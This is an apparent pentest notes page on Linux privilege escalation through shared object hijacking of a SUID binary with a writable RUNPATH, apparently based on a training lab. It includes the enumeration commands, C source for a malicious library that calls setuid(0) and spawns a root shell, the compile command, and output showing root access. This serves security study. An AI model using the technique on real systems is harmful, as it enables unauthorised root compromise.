> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/shared-object-hijacking.md).

# Shared Object Hijacking

## Identification

```
find / -type f -perm -u=s 2>/dev/null | xargs ls -l
```

<figure><img src="/files/pB82pyGePesVfNaAHlM5" alt=""><figcaption></figcaption></figure>

```shell-session
$ ls -la payroll

-rwsr-xr-x 1 root root 16728 Sep  1 22:05 payroll
```

### Print the shared object required by a binary or shared object

```shell-session
$ ldd payroll

linux-vdso.so.1 =>  (0x00007ffcb3133000)
libshared.so => /lib/x86_64-linux-gnu/libshared.so (0x00007f7f62e51000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)
```

### Runpath

```shell-session
$ readelf -d payroll  | grep PATH

 0x000000000000001d (RUNPATH)            Library runpath: [/development]
```

```shell-session
ls -la /development/

total 8
drwxrwxrwx  2 root root 4096 Sep  1 22:06 ./
drwxr-xr-x 23 root root 4096 Sep  1 21:26 ../
```

```shell-session
cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
```

```shell-session
$ ldd payroll

linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)
```

Running `ldd` against the binary lists the library's path as `/development/libshared.`so, which means that it is vulnerable

```shell-session
$ ./payroll 

./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
```

&#x20;Compile a shared object which includes the missing function

## Exploitation

```c
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
} 
```

```shell-session
gcc src.c -fPIC -shared -o /development/libshared.so
```

```shell-session
$ ./payroll 

***************Inlane Freight Employee Database***************

Malicious library loaded
# id
uid=0(root) gid=1000(mrb3n) groups=1000(mrb3n)
```

## Tool

{% embed url="<https://github.com/eblazquez/fakelib.sh>" %}

## Resources

{% embed url="<https://www.boiteaklou.fr/Abusing-Shared-Libraries.html>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/shared-library-hijacking/>" %}

{% embed url="<https://0xdf.gitlab.io/2019/02/02/htb-dab.html#privesc-genevieve--root>" %}

<br>
